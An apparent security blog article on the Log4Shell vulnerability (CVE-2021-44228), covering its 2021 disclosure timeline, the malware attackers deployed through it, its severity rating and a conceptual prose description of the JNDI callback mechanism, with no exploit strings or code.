Log4Shell Unleashed - Vulnerability, attacks, and mitigations

On December 10, 2021, the security industry was shaken when a critical remote code execution vulnerability dubbed as “Log4Shell” unleashed itself. Security researcher Chen Zhaojun of Alibaba, first reported the vulnerability to the Apache Foundation on November 24, 2021. On December 9, 2021, an attack on servers that host the game Minecraft was discovered. After further forensic analysis, it was found cybercriminals discovered the gap earlier, and have exploited it since at least December 1, 2021. What followed was a continuous onslaught by attackers including ransomware groups as well as nation state actors leaving the cyber defenders scampering for mitigations. Financially motivated adversaries quickly adopted publicly available proof-of-concept (POC) to deploy malicious payloads on vulnerable target systems, with most deployed payloads involving XMRig miners, reverse shells, remote access trojans and botnets. Without proper mitigations or patching, attackers can use the vulnerability to deploy malware, reverse shells and other threats on impacted systems. Industry reports of other threats targeting operating systems and frameworks vulnerable to the Log4j2 exploitation include beacons — such as Cobalt Strike and Metasploit — being deployed in an attempt to establish a foothold in target environments. The vulnerability impacts the Apache Log4j Java-based logging platform used to access web server and application logs. The vulnerability, published as CVE-2021-44228, enables a remote attacker to take control of a device on the internet if the device is running certain versions of Log4j. The Apache Software Foundation, which publishes the Log4j 2 library, gave the vulnerability a CVSS score of 10 out of 10, the highest-level severity score, because of its potential for widespread exploitation and the ease with which malicious attackers can exploit it. The exploit allows an attacker to trigger this vulnerability when specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j. This causes the string to be appended to the web server's access logs. When the Log4j application parses these logs and encounters the string, the bug will force the server to make a callback, or request, to the URL listed in the JNDI string. Threat actors can then use that URL to pass Base64-encoded commands or Java classes to execute on the vulnerable device.